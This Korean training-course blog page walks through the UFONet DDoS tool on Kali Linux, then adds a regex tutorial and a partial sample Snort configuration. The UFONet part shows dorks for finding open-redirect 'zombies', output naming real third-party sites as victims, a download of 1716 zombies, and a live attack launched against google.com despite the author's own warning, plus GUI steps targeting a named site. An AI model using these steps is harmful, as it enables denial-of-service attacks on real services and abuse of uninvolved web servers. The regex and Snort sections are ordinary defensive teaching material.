블로그 이미지
22Hz 22Hz

카테고리

분류 전체보기 (109)
모의해킹 침해대응 전문가 과정 (99)
리눅스 설정 (10)
Total
Today
Yesterday

달력

« » 2024.4
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

공지사항

태그목록

최근에 올라온 글

[실습] ufsnet 사용한 DDoS Attack 시뮬레이션


■ 사용 시스템

- KaliLinux


■ 사용 프로그램

- ufonet


UFONET 동작원리

UFONET GUI 툴



Description

UFONet is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third party web applications like botnet.


See this links for more info:


- CWE-601:Open Redirect:

http://cwe.mitre.org/data/definitions/601.html


- OWASP:URL Redirector Abuse:

https://www.owasp.org/index.php/OWASP_Periodic_Table_of_Vulnerabilities_-_URL_Redirector_Abuse2


UFONet abuses OSI Layer 7-HTTP to create/manage 'zombies' and to conduct different attacks using; GET/POST, multithreading, proxies, origin spoofing methods, cache evasion techniques, etc.


[Video] -> http://ufonet.03c8.net/ufonet/UFONet-v0.6.ogv



Features

Auto-update

Clean code (only needs python-pycurl)

Documentation with examples

Web/GUI Interface

Proxy to connect to 'zombies' (ex: tor)

Change HTTP Headers (User-Agent, Referer, Host...)

Configure requests (Timeout, Retries, Delay...)

Search for 'zombies' on google results (using a pattern or a list of dorks)

Test 'Open Redirect' vulnerabilities on 'zombies'

Download/Upload 'zombies' from Community

Inspect a target (HTML objects sizes)

Set a place to 'bit' on a target (ex: big file)

Control number of rounds to attack

Apply cache evasion techniques

Supports GET/POST

Multithreading

Different search engines for dorking

Web interface

Geomapping / Visual data

Order 'zombies' to attack you for benchmarking

etc


(KaliLinux)


① ufonet 프로그램 다운로드

www.sourceforge.net 접속하여

-> "ufonet" 프로그램 검색

-> 파일이름: ufonet-v0.5b.zip

            ufonet-v0.6.zip

-> 0.5b 버전과 0.6 버전이 GUI Web으로 설정하는 화면이 조금 틀리다.

-> 0.6 버전은 여러가지 기능이 추가되었다.


ufonet 프로그램 직접 다운로드 하는 사이트

- https://sourceforge.net/projects/ufonet/?source=directory



② ufonet 프로그램 압축 해제 및 디렉토리 확인

/test1 디렉토리에 ufonet-v0.6.zip 파일을 다운로드 받은 상태이다.


# cd /test1

# unzip ufonet-v0.6.zip

-> 출력내용 생략


# ls

ufonet/  ufonet-v0.6.zip


# cd ufonet

# ls

README.md  ufonet/


# cd ufonet

# ls

aliens.txt  core/  docs/  dorks.txt  server/  ufonet*  zombies.txt


③ ufonet 사용법 확인

# ./ufonet

=========================================================================== 

 

888     888 8888888888 .d88888b.  888b    888          888   

888     888 888        d88PY888b  8888b   888          888   

888     888 888       888     888 88888b  888          888   

888     888 8888888   888     888 888Y88b 888  .d88b.  888888

888     888 888       888     888 888 Y88b888 d8P  Y8b 888   

888     888 888       888     888 888  Y88888 88888888 888   

Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b. 

 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================





# ./ufonet --help

Usage: UFONet.py [options]

 

 UFONet - DDoS Botnet via Web Abuse - by psy

 

Options:

  --version             show program's version number and exit

  -h, --help            show this help message and exit

  -v, --verbose         active verbose on requests

  --update              check for latest stable version

  --check-tor           check to see if Tor is used properly

  --force-yes           set 'YES' to all questions

  --disableisup         disable external check of target's status

  --gui                 run GUI (UFONet Web Interface)

 

  *Configure Request(s)*:

    --proxy=PROXY       Use proxy server (tor: 'http://127.0.0.1:8118')

    --user-agent=AGENT  Use another HTTP User-Agent header (default SPOOFED)

    --referer=REFERER   Use another HTTP Referer header (default SPOOFED)

    --host=HOST         Use another HTTP Host header (default NONE)

    --xforw             Set your HTTP X-Forwarded-For with random IP values

    --xclient           Set your HTTP X-Client-IP with random IP values

    --timeout=TIMEOUT   Select your timeout (default 10)

    --retries=RETRIES   Retries when the connection timeouts (default 1)

    --threads=THREADS   Maximum number of concurrent HTTP requests (default 5)

    --delay=DELAY       Delay in seconds between each HTTP request (default 0)

 

  *Search for 'Zombies'*:

    -s SEARCH           Search from a 'dork' (ex: -s 'proxy.php?url=')

    --sd=DORKS          Search from a list of 'dorks' (ex: --sd 'dorks.txt')

    --sn=NUM_RESULTS    Set max number of results for engine (default 10)

    --se=ENGINE         Search engine to use for 'dorking' (default: duck)

    --sa                Search massively using all search engines

 

  *Test Botnet*:

    -t TEST             Update 'zombies' status (ex: -t 'zombies.txt')

    --attack-me         Order 'zombies' to attack you (NAT required!)

 

  *Community*:

   --download-zombies  Download 'zombies' from Community server: Turina

    --upload-zombies    Upload your 'zombies' to Community server: Turina

    --blackhole         Create a 'blackhole' to share your 'zombies'

    --up-to=UPIP        Upload your 'zombies' to a 'blackhole'

    --down-from=DIP     Download your 'zombies' from a 'blackhole'

 

  *Research Target*:

    -i INSPECT          Search for biggest file (ex: -i 'http://target.com')

 

  *Configure Attack(s)*:

    --disable-aliens    Disable 'aliens' web abuse of test services

    --disable-isup      Disable check status 'is target up?'

    -r ROUNDS           Set number of rounds (default: 1)

    -b PLACE            Set place to attack (ex: -b '/path/big.jpg')

    -a TARGET           Start Web DDoS attack (ex: -a 'http(s)://target.com')





④ google 검색 엔진을 통해 zombie PC를 검색

기본 검색 엔진은 duck 이다.(지정을 하지 않으면 duck 기본값)

지원되는 검색 엔진의 종류는 많다.
Search engines available:
-------------------------
+ duck
+ google
+ bing
+ yahoo
+ yandex
-------------------------

지원되는 종류를 --se 옵션 다음에 지정하여 사용하면 된다.

Zomebie PC를 검색할 때 사용하는 Keyword는 많다.(ufonet/ufonet/dorks.txt 파일 참조)
----------------------------------------------
proxy.php
?url=
check.cgi?url=
checklink?uri=
validator?uri=
redirect_uri=
redirect=
referer=
pageurl=
returnUrl=
goto=
redir=
openfile=
open=
page=
pagina=
return=
link=
?url=
?uri=
url=
----------------------------------------------

적당한 키워드를 사용한다.


# ./ufonet -s 'index.php?url=' --se google

=========================================================================== 

 

888     888 8888888888 .d88888b.  888b    888          888   

888     888 888        d88P Y888b 8888b   888          888   

888     888 888       888     888 88888b  888          888   

888     888 8888888   888     888 888Y88b 888  .d88b.  888888

888     888 888       888     888 888 Y88b888 d8P  Y8b 888   

888     888 888       888     888 888  Y88888 88888888 888   

Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b. 

 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================

 

Searching for 'zombies' using: google

 

======================

 

+Victim found: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://daimi.au.dk/CPnets/proxy.php?url=

------------

+Victim found: http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

------------

+Victim found: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

+Victim found: http://judicial.ronny.tw/proxy.php?url=

------------

+Victim found: http://2ch.io/img.theqoo.net/proxy.php?url=

------------

+Victim found: http://www.eurasiam.com/proxy.php?url=

------------

+Victim found: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

------------

 

======================

+Possible Zombies: 8

======================

 

Wanna check if they are valid zombies? (Y/n)

Y

Are 'they' alive? :-) (HEAD Check):

===================================

Trying: 8

---------------------

Zombie: judicial.ronny.tw

Status: Ok [200]

----------

Zombie: reprints.ygsgroup.com

Status: Ok [200]

----------

Zombie: www.icap2014.com

Status: Ok [200]

----------

Zombie: 2ch.io

Status: Ok [200]

----------

Zombie: www.sltrib.com

Status: Ok [200]

----------

Zombie: www.eurasiam.com

Status: Ok [200]

----------

Zombie: daimi.au.dk

Status: Ok [200]

----------

Zombie: business.louisville.edu http://business.louisville.edu/cob-it-blog/wp-content/plugins/google-document-embedder/proxy.php?url=

Status: Not Allowed [0]

----------

==================

OK: 7 Fail: 1

==================

======================

Checking for payloads:

======================

Trying: 7

---------------------

Vector: http://2ch.io/img.theqoo.net/proxy.php?url=

Status: Not ready...

----------

Vector: http://judicial.ronny.tw/proxy.php?url=

Status: Not ready...

----------

Vector: http://reprints.ygsgroup.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Not ready...

----------

Vector: http://www.icap2014.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://www.eurasiam.com/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://daimi.au.dk/CPnets/proxy.php?url=

Status: Waiting your orders...

----------

Vector: http://www.sltrib.com/cms/sites/all/modules/ckeditor_link/proxy.php?url=

Status: Not ready...

----------

==================

OK: 3 Fail: 4

==================

==================

Army of 'zombies'

==================

------------------

Total Army: 3

------------------

Wanna update your army (Y/n)Y

-------------------------

 

[Info] - Botnet updated! ;-)


⑤ community server(Turina)로 부터 zombies 목록 다운로드

# ./ufonet --download-zombies

=========================================================================== 

 

888     888 8888888888 .d88888b.  888b    888          888   

888     888 888        d88P Y888b 8888b   888          888   

888     888 888       888     888 88888b  888          888   

888     888 8888888   888     888 888Y88b 888  .d88b.  888888

888     888 888       888     888 888 Y88b888 d8P  Y8b 888   

888     888 888       888     888 888  Y88888 88888888 888   

Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b. 

 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================

 

Downloading list of 'zombies' from server ...

 

======================

 

Trying 'blackhole': 176.28.23.46

 

Vortex: IS READY!

------------

 

[Info] - Congratulations!. Total of 'zombies' downloaded: 1716

------------

 

Wanna merge ONLY new 'zombies' to your army (Y/n) Y

-------------------------

 

[Info] - Botnet updated! ;-)


⑥ ufonet CLI 명령어를 통해 공격 작업을 수행

# ./ufonet -a http://www.google.com

=========================================================================== 

 

888     888 8888888888 .d88888b.  888b    888          888   

888     888 888        d88P Y888b 8888b   888          888   

888     888 888       888     888 88888b  888          888   

888     888 8888888   888     888 888Y88b 888  .d88b.  888888

888     888 888       888     888 888 Y88b888 d8P  Y8b 888   

888     888 888       888     888 888  Y88888 88888888 888   

Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b. 

 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

 

UFONet - DDoS Botnet via Web Abuse - by psy

 

===========================================================================

Attacking:  http://www.google.com

=======================================================

 

=====================

Round: 'Is target up?'

=====================

[Info] From here: YES

---------------------

[Info] From exterior: YES

---------------------

[Info] Your target looks ONLINE!. Wanna start a DDoS attack? (y/N)

y        <---- (주의) 실습에서는 'y' 선택하면 안된다. 반드시 'n' 선택한다.

 

 

==========================================

Starting round: 1  of  1

==========================================

[Info] Attacking from: www.gamengame.com

[Info] Attacking from: brangerbriz.net

[Info] Attacking from: whitehousesurgery.org

[Info] Attacking from: msdn.developer-works.com

[Info] Attacking from: www.dog-ryusen.com

[Info] Attacking from: www.jerrywho.de

[Info] Attacking from: www.webdeveloper.com

[Info] Attacking from: www.dietistdenennie.nl

[Info] Attacking from: www.xmarks.com

[Info] Attacking from: www.sealyham.sk

[Info] Attacking from: www.nobelprize.org

[Info] Attacking from: www.haberoku.com

[Info] Attacking from: www.foiredelibramont.com

[Info] Attacking from: my.pdx.edu

[Info] Attacking from: engagethepower.org

[Info] Attacking from: lovenest.ru

[Info] Attacking from: ckthonon.free.fr

..... (중략) .....

[Info] Attacking from: www.metamodpro.com

[Info] Attacking from: www.otohaya.com

[Info] Attacking from: www.scafco.com

[Info] Attacking from: 7ba.ru

[Info] Attacking from: business.louisville.edu

[Info] Attacking from: evoec.com

[Info] Attacking from: www.jotform.com

[Info] Attacking from: msdn.developer-works.com

[Info] Attacking from: www2.ogs.state.ny.us

..... (중략) .....

<CTRL + Z>

[1]+  Stopped                 ./ufonet -a http://www.google.com

-> 공격은 잠깐만 확인해 보고 끊어야 한다.

-> 지속적으로 공격하면 안된다.


# kill %1

[1]+  Stopped                 ./ufonet -a http://www.google.com


# jobs

[1]+  Terminated              ./ufonet -a http://www.google.com


# jobs

#



⑦ ufonet GUI 툴을 실행하여 공격 작업을 진행

# ./ufonet --gui

<START MOTHERSHIP!> 선택


<Wormhole> 부분에 마우스 포인터를 올린다.





<Wormhole> 부분에 마우스 포인터를 올리면 다양한 메뉴가 나온다.



그 중에서 <Botnet> 부분을 선택한다.




<List 'zombies'> 선택하고 화면의 하단 부분으로 스크롤하여 확인한다.



<Attack> 부분을 선택한다.






Set your target:

     http://www.soldesk.com

Set place to attack:

      /path/big.jpg



Set your target: http://www.soldesk.com

Set place to attack

(주의) 절대 START 하면 안된다.






⑧ Botnet/DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE


다음 웹사이트에 접속한다.

http://map.norsecorp.com/

               




[참고 URL]

How to create botnets for DDoS attacks (2015) using Kali linux

- https://www.youtube.com/watch?v=xCqHxz4ufvo


Botnet / DDoS Attack - Norse Live Footage REALTIME 1 APRIL 2015 LIVE

- https://www.youtube.com/watch?v=quGv7Bf5BiY

- http://map.norsecorp.com/





                PCRE(Perl Compatible Regular Expression)



1. 정규 표현식이란?


정규표현식(Regualr Expression)은 특정한 규칙을 가진 문자열의 집합을 표현하는데 사용하는 형식 언어이다.

정규 표현식은 많은 텍스트 편집기와 프로그래밍 언어에서 문자열의 검색 치환을 위해 지원된다.




2. 실습을 위한 준비(필요한 프로그램 - 윈도우용)


적당한 프로그램 다운로드 받고 설치한다.

- (유료) RegexBuddy(http://www.regexbuddy.com/)

or

- (무료) Rad.RegexDesigner(http://www.radsoftware.com.au/regexdesigner/)

        -> 공유디렉토리 사용



3. 메타 문자(Metacharacter) 종류와 의미


■ 메타문자: .

"\n"을 제외한 모든 단일 문자를 찾는다.
"\n"을 포함한 모든 문자를 찾으려면 '[.\n]' 패턴을 사용함


[실습] .

표현식  h.t

문자열  hat halt hit heat hot




■ 메타문자: ?

? 문자 바로 앞에 있는 문자가 0 또는 1회 반복되는 것을 가리킨다.


[실습] 

표현식  ha?t

문자열  ht hit hat hot haat hut haaaaat



■ 메타문자: *

앞의 문자를 0회 이상을 반복한다.


[실습] 

표현식  ha*t

문자열  ht hit hat hot haat hut haaaat


■ 메타문자: +

앞의 문자를 1회 이상을 반복한다.


[실습] 

표현식  ha+t

문자열  ht hit hat hot haat hut haaaaat



■ 메타문자: ^

^은 줄의 제일 처음(시작위치)을 카리킨다.

입력 문자열의 시작 위치를 찾음. Multiline 속성이 설정되어 있으면 '\n' 또는 '\r' 앞의 위치를 찾는다.


[실습] 

표현식  ^h.t

문자열  hat hit hot

■ 메타문자: $

$는 줄의 제일 마지막(끝 위치)을 가리킨다.

입력 문자열의 끝 위치를 찾음. Multiline 속성이 설정되어 있으면 '\n' 또는 '\r' 뒤의 위치를 찾는다.


[실습] 

표현식  h.t$

문자열  hat hit hot



■ 메타문자: (pattern)

정규식 내에서 패턴을 그룹화 한다.

특정 패턴을 묶어서 반복 기호등과 함께 사용한다.

여러 문자 중 하나만 선택적으로 매칭하고자 할 때 사용


[실습] 

표현식  ba(na)*

문자열  ba na bana banana nana bananana


표현식  ba(na)+

문자열  ba na bana banana nana bananana



■ 메타문자: (|)

| 기호를 기준으로 앞뒤의 값들 중의 하나 선택

괄호로 묶인 그룹 내에서 | 으로 나뉘어진 여러개의 패턴 중 하나와 일치하는 것을 가리킨다.


[실습] 

표현식  (eg|sa|be)g

문자열  egg eng sag sig beg bag



■ 메타문자: {n}

바로 앞의 문자를 정확히 n번 반복한다.


[실습] 

표현식  ha{2}t

문자열  ht hit hat hot haat hut haaaaat



■ 메타문자: {n,}

바로 앞의 문자를 n번 이상 반복 한다.

{0,}는 별표(*)와 같은 의미이다.

{1,}는 더하기(+)와 같은 의미이다.

{0,1}는 물음표(?)와 같은 의미이다.


[실습] 

표현식  ha{2,}t

문자열  ht hit hat hot haat hut haaaaat



■ 메타문자: {n,m}

바로 앞의 문자를 n번 이상 m회 이하 반복 한다.


[실습] 

표현식  ha{2,4}t

문자열  ht hat haat haaat haaaat haaaaat





■ 문자 집합: []

괄호 안의 문자 중 하나를 찾는다.

[abc]   a, b, c 중 하나

[a-z]   알파벳 소문자 중 하나

[0-9]   숫자 중 하나

[a-zA-Z] 알파벳 소문자나 대문자 중 하나


[실습] 

표현식  h[aiu]t

문자열  hat het hit hot hut



■ 메타문자: [^xyz]

[^]은 안에 있는 문자를 제외한 문자중 하나를 가리킨다.

[^abc]  a,b,c 이외의 문자 중 하나

[^a-z]  알파벳 소문자 이외의 문자 중 하나

[^0-9]  숫자 이외의 문자 중 하나

[^a-zA-Z]       알파벳 소문자나 대문자 이외의 문자 중 하나


[실습] 

표현식  h[^aiu]t

문자열  hat het hit hot hut









snort architecture & snort rules










































다음 내용은 "기업정보호전문가 양성과정 시스템 정보보안 기술 실무" 책의 일부 내용입니다.


 













































































































































Snort 설치 및 운영 방법



CentOS 6.X에 Snort 설치하기

- 참고 페이지 https://www.snort.org/#get-started

- 참고 페이지 http://www.youtube.com/watch?v=DYBfCyd6cC0





[참고] snort.conf 예제 파일(http://labs.snort.org/snort/2956/snort.conf)


#--------------------------------------------------

#   VRT Rule Packages Snort.conf

#

#   For more information visit us at:

#    http://www.snort.org                   Snort Website

#    http://vrt-blog.snort.org/    Sourcefire VRT Blog

#

#     Mailing list Contact:      snort-sigs@lists.sourceforge.net

#     False Positive reports:    fp@sourcefire.com

#     Snort bugs:                bugs@snort.org

#

#     Compatible with Snort Versions:

#     VERSIONS : 2.9.5.6

#

#     Snort build options:

#    OPTIONS : --enable-gre --enable-mpls --enable-targetbased --enable-ppm --enable-perfprofiling

# --enable-zlib --enable-active-response --enable-normalizer --enable-reload --enable-react

# --enable-flexresp3

#

#     Additional information:

#     This configuration file enables active response, to run snort in

#     test mode -T you are required to supply an interface -i <interface>

#     or test mode will fail to fully validate the configuration and

#     exit with a FATAL error

#--------------------------------------------------

 

###################################################

# This file contains a sample snort configuration.

# You should take the following steps to create your own custom configuration:

#

1) Set the network variables.

2) Configure the decoder

3) Configure the base detection engine

4) Configure dynamic loaded libraries

5) Configure preprocessors

# 6) Configure output plugins

7) Customize your rule set

# 8) Customize preprocessor and decoder rule set

9) Customize shared object rule set

###################################################

 

###################################################

# Step #1: Set the network variables.  For more information, see README.variables

###################################################

 

# Setup the network addresses you are protecting

ipvar HOME_NET any

 

# Set up the external network addresses. Leave as "any" in most situations

ipvar EXTERNAL_NET any

 

# List of DNS servers on your network

ipvar DNS_SERVERS $HOME_NET

 

# List of SMTP servers on your network

ipvar SMTP_SERVERS $HOME_NET

 

# List of web servers on your network

ipvar HTTP_SERVERS $HOME_NET

 

# List of sql servers on your network

ipvar SQL_SERVERS $HOME_NET

 

# List of telnet servers on your network

ipvar TELNET_SERVERS $HOME_NET

 

# List of ssh servers on your network

ipvar SSH_SERVERS $HOME_NET

 

# List of ftp servers on your network

ipvar FTP_SERVERS $HOME_NET

 

# List of sip servers on your network

ipvar SIP_SERVERS $HOME_NET

 

# List of ports you run web servers on

portvar HTTP_PORTS [36,80,81,82,83,84,85,86,87,88,89,90,311,383,555,591,593,631,801,808,818,901,972,1158,1220,1414,1533,1741,1830,1942,2231,2301,2381,2578,2809,2980,3029,3037,3057,3128,3443,3702,4000,4343,4848,5000,5117,5250,5600,6080,6173,6988,7000,7001,7071,7144,7145,7510,7770,7777,7778,7779,8000,8008,8014,8028,8080,8081,8082,8085,8088,8090,8118,8123,8180,8181,8222,8243,8280,8300,8333,8344,8500,8509,8800,8888,8899,8983,9000,9060,9080,9090,9091,9111,9290,9443,9999,10000,11371,12601,13014,15489,29991,33300,34412,34443,34444,41080,44449,50000,50002,51423,53331,55252,55555,56712]

 

# List of ports you want to look for SHELLCODE on.

portvar SHELLCODE_PORTS !80

 

# List of ports you might see oracle attacks on

portvar ORACLE_PORTS 1024:

 

# List of ports you want to look for SSH connections on:

portvar SSH_PORTS 22

 

# List of ports you run ftp servers on

portvar FTP_PORTS [21,2100,3535]

 

# List of ports you run SIP servers on

portvar SIP_PORTS [5060,5061,5600]

 

# List of file data ports for file inspection

portvar FILE_DATA_PORTS [$HTTP_PORTS,110,143]

 

# List of GTP ports for GTP preprocessor

portvar GTP_PORTS [2123,2152,3386]

 

# other variables, these should not be modified

ipvar AIM_SERVERS [64.12.24.0/23,64.12.28.0/23,64.12.161.0/24,64.12.163.0/24,64.12.200.0/24,205.188.3.0/24,205.188.5.0/24,205.188.7.0/24,205.188.9.0/24,205.188.153.0/24,205.188.179.0/24,205.188.248.0/24]

 

# Path to your rules files (this can be a relative path)

# Note for Windows users:  You are advised to make this an absolute path,

# such as:  c:\snort\rules

var RULE_PATH ../rules

var SO_RULE_PATH ../so_rules

var PREPROC_RULE_PATH ../preproc_rules

 

# If you are using reputation preprocessor set these

var WHITE_LIST_PATH ../rules

var BLACK_LIST_PATH ../rules

 

###################################################

# Step #2: Configure the decoder.  For more information, see README.decode

###################################################

 

# Stop generic decode events:

config disable_decode_alerts

 

# Stop Alerts on experimental TCP options

config disable_tcpopt_experimental_alerts

 

# Stop Alerts on obsolete TCP options

config disable_tcpopt_obsolete_alerts

 

# Stop Alerts on T/TCP alerts

config disable_tcpopt_ttcp_alerts

 

# Stop Alerts on all other TCPOption type events:

config disable_tcpopt_alerts

 

# Stop Alerts on invalid ip options

config disable_ipopt_alerts

 

# Alert if value in length field (IP, TCP, UDP) is greater th elength of the packet

# config enable_decode_oversized_alerts

 

# Same as above, but drop packet if in Inline mode (requires enable_decode_oversized_alerts)

# config enable_decode_oversized_drops

 

# Configure IP / TCP checksum mode

config checksum_mode: all

 

# Configure maximum number of flowbit references.  For more information, see README.flowbits

# config flowbits_size: 64

 

# Configure ports to ignore

# config ignore_ports: tcp 21 6667:6671 1356

# config ignore_ports: udp 1:17 53

 

# Configure active response for non inline operation. For more information, see REAMDE.active

# config response: eth0 attempts 2

 

# Configure DAQ related options for inline operation. For more information, see README.daq

#

# config daq: <type>

# config daq_dir: <dir>

# config daq_mode: <mode>

# config daq_var: <var>

#

# <type> ::= pcap | afpacket | dump | nfq | ipq | ipfw

# <mode> ::= read-file | passive | inline

# <var> ::= arbitrary <name>=<value passed to DAQ

# <dir> ::= path as to where to look for DAQ module so's

 

# Configure specific UID and GID to run snort as after dropping privs. For more information see snort -h command line options

#

# config set_gid:

# config set_uid:

 

# Configure default snaplen. Snort defaults to MTU of in use interface. For more information see README

#

# config snaplen:

#

 

# Configure default bpf_file to use for filtering what traffic reaches snort. For more information see snort -h command line options (-F)

#

# config bpf_file:

#

 

# Configure default log directory for snort to log to.  For more information see snort -h command line options (-l)

#

# config logdir:

 

 

###################################################

# Step #3: Configure the base detection engine.  For more information, see  README.decode

###################################################

 

# Configure PCRE match limitations

config pcre_match_limit: 3500

config pcre_match_limit_recursion: 1500

 

# Configure the detection engine  See the Snort Manual, Configuring Snort - Includes - Config

config detection: search-method ac-split search-optimize max-pattern-len 20

 

# Configure the event queue.  For more information, see README.event_queue

config event_queue: max_queue 8 log 5 order_events content_length

 

###################################################

## Configure GTP if it is to be used.

## For more information, see README.GTP

####################################################

 

# config enable_gtp

 

###################################################

# Per packet and rule latency enforcement

# For more information see README.ppm

###################################################

 

# Per Packet latency configuration

#config ppm: max-pkt-time 250, \

#   fastpath-expensive-packets, \

#   pkt-log

 

# Per Rule latency configuration

#config ppm: max-rule-time 200, \

#   threshold 3, \

#   suspend-expensive-rules, \

#   suspend-timeout 20, \

#   rule-log alert

 

###################################################

# Configure Perf Profiling for debugging

# For more information see README.PerfProfiling

###################################################

 

#config profile_rules: print all, sort avg_ticks

#config profile_preprocs: print all, sort avg_ticks

 

###################################################

# Configure protocol aware flushing

# For more information see README.stream5

###################################################

config paf_max: 16000

 

###################################################

# Step #4: Configure dynamic loaded libraries.

# For more information, see Snort Manual, Configuring Snort - Dynamic Modules

###################################################

 

# path to dynamic preprocessor libraries

dynamicpreprocessor directory /usr/local/lib/snort_dynamicpreprocessor/

 

# path to base preprocessor engine

dynamicengine /usr/local/lib/snort_dynamicengine/libsf_engine.so

 

# path to dynamic rules libraries

dynamicdetection directory /usr/local/lib/snort_dynamicrules

 

###################################################

# Step #5: Configure preprocessors

# For more information, see the Snort Manual, Configuring Snort - Preprocessors

###################################################

 

# GTP Control Channle Preprocessor. For more information, see README.GTP

# preprocessor gtp: ports { 2123 3386 2152 }

 

# Inline packet normalization. For more information, see README.normalize

# Does nothing in IDS mode

preprocessor normalize_ip4

preprocessor normalize_tcp: ips ecn stream

preprocessor normalize_icmp4

preprocessor normalize_ip6

preprocessor normalize_icmp6

 

# Target-based IP defragmentation.  For more inforation, see README.frag3

preprocessor frag3_global: max_frags 65536

preprocessor frag3_engine: policy windows detect_anomalies overlap_limit 10 min_fragment_length 100 timeout 180

 

# Target-Based stateful inspection/stream reassembly.  For more inforation, see README.stream5

preprocessor stream5_global: track_tcp yes, \

   track_udp yes, \

   track_icmp no, \

   max_tcp 262144, \

   max_udp 131072, \

   max_active_responses 2, \

   min_response_seconds 5

preprocessor stream5_tcp: policy windows, detect_anomalies, require_3whs 180, \

   overlap_limit 10, small_segments 3 bytes 150, timeout 180, \

    ports client 21 22 23 25 42 53 70 79 109 110 111 113 119 135 136 137 139 143 \

        161 445 513 514 587 593 691 1433 1521 1741 2100 3306 6070 6665 6666 6667 6668 6669 \

        7000 8181 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779, \

    ports both 36 80 81 82 83 84 85 86 87 88 89 90 110 311 383 443 465 563 555 591 593 631 636 801 808 818 901 972 989 992 993 994 995 1158 1220 1414 1533 1741 1830 1942 2231 2301 2381 2578 2809 2980 3029 3037 3057 3128 3443 3702 4000 4343 4848 5000 5117 5250 5600 6080 6173 6988 7907 7000 7001 7071 7144 7145 7510 7802 7770 7777 7778 7779 \

        7801 7900 7901 7902 7903 7904 7905 7906 7908 7909 7910 7911 7912 7913 7914 7915 7916 \

        7917 7918 7919 7920 8000 8008 8014 8028 8080 8081 8082 8085 8088 8090 8118 8123 8180 8181 8222 8243 8280 8300 8333 8344 8500 8509 8800 8888 8899 8983 9000 9060 9080 9090 9091 9111 9290 9443 9999 10000 11371 12601 13014 15489 29991 33300 34412 34443 34444 41080 44449 50000 50002 51423 53331 55252 55555 56712

preprocessor stream5_udp: timeout 180

 

# performance statistics.  For more information, see the Snort Manual, Configuring Snort - Preprocessors - Performance Monitor

# preprocessor perfmonitor: time 300 file /var/snort/snort.stats pktcnt 10000

 

# HTTP normalization and anomaly detection.  For more information, see README.http_inspect

preprocessor http_inspect: global iis_unicode_map unicode.map 1252 compress_depth 65535 decompress_depth 65535

preprocessor http_inspect_server: server default \

    http_methods { GET POST PUT SEARCH MKCOL COPY MOVE LOCK UNLOCK NOTIFY POLL BCOPY BDELETE BMOVE LINK UNLINK OPTIONS HEAD DELETE TRACE TRACK CONNECT SOURCE SUBSCRIBE UNSUBSCRIBE PROPFIND PROPPATCH BPROPFIND BPROPPATCH RPC_CONNECT PROXY_SUCCESS BITS_POST CCM_POST SMS_POST RPC_IN_DATA RPC_OUT_DATA RPC_ECHO_DATA } \

    chunk_length 500000 \

    server_flow_depth 0 \

    client_flow_depth 0 \

    post_depth 65495 \

    oversize_dir_length 500 \

    max_header_length 750 \

    max_headers 100 \

    max_spaces 200 \

    small_chunk_length { 10 5 } \

    ports { 36 80 81 82 83 84 85 86 87 88 89 90 311 383 555 591 593 631 801 808 818 901 972 1158 1220 1414 1533 1741 1830 1942 2231 2301 2381 2578 2809 2980 3029 3037 3057 3128 3443 3702 4000 4343 4848 5000 5117 5250 5600 6080 6173 6988 7000 7001 7071 7144 7145 7510 7770 7777 7778 7779 8000 8008 8014 8028 8080 8081 8082 8085 8088 8090 8118 8123 8180 8181 8222 8243 8280 8300 8333 8344 8500 8509 8800 8888 8899 8983 9000 9060 9080 9090 9091 9111 9290 9443 9999 10000 11371 12601 13014 15489 29991 33300 34412 34443 34444 41080 44449 50000 50002 51423 53331 55252 55555 56712 } \

    non_rfc_char { 0x00 0x01 0x02 0x03 0x04 0x05 0x06 0x07 } \

    enable_cookie \

    extended_response_inspection \

    inspect_gzip \

    normalize_utf \

    unlimited_decompress \

    normalize_javascript \

    apache_whitespace no \

    ascii no \

    bare_byte no \

    directory no \

    double_decode no \

    iis_backslash no \

    iis_delimiter no \

    iis_unicode no \

    multi_slash no \

    utf_8 no \

    u_encode yes \

    webroot no

 

# ONC-RPC normalization and anomaly detection.  For more information, see the Snort Manual, Configuring Snort - Preprocessors - RPC Decode

preprocessor rpc_decode: 111 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 no_alert_multiple_requests no_alert_large_fragments no_alert_incomplete

 

# Back Orifice detection.

preprocessor bo

 

# FTP / Telnet normalization and anomaly detection.  For more information, see README.ftptelnet

preprocessor ftp_telnet: global inspection_type stateful encrypted_traffic no check_encrypted

preprocessor ftp_telnet_protocol: telnet \

    ayt_attack_thresh 20 \

    normalize ports { 23 } \

    detect_anomalies

preprocessor ftp_telnet_protocol: ftp server default \

    def_max_param_len 100 \

    ports { 21 2100 3535 } \

    telnet_cmds yes \

    ignore_telnet_erase_cmds yes \

    ftp_cmds { ABOR ACCT ADAT ALLO APPE AUTH CCC CDUP } \

    ftp_cmds { CEL CLNT CMD CONF CWD DELE ENC EPRT } \

    ftp_cmds { EPSV ESTA ESTP FEAT HELP LANG LIST LPRT } \

    ftp_cmds { LPSV MACB MAIL MDTM MIC MKD MLSD MLST } \

    ftp_cmds { MODE NLST NOOP OPTS PASS PASV PBSZ PORT } \

    ftp_cmds { PROT PWD QUIT REIN REST RETR RMD RNFR } \

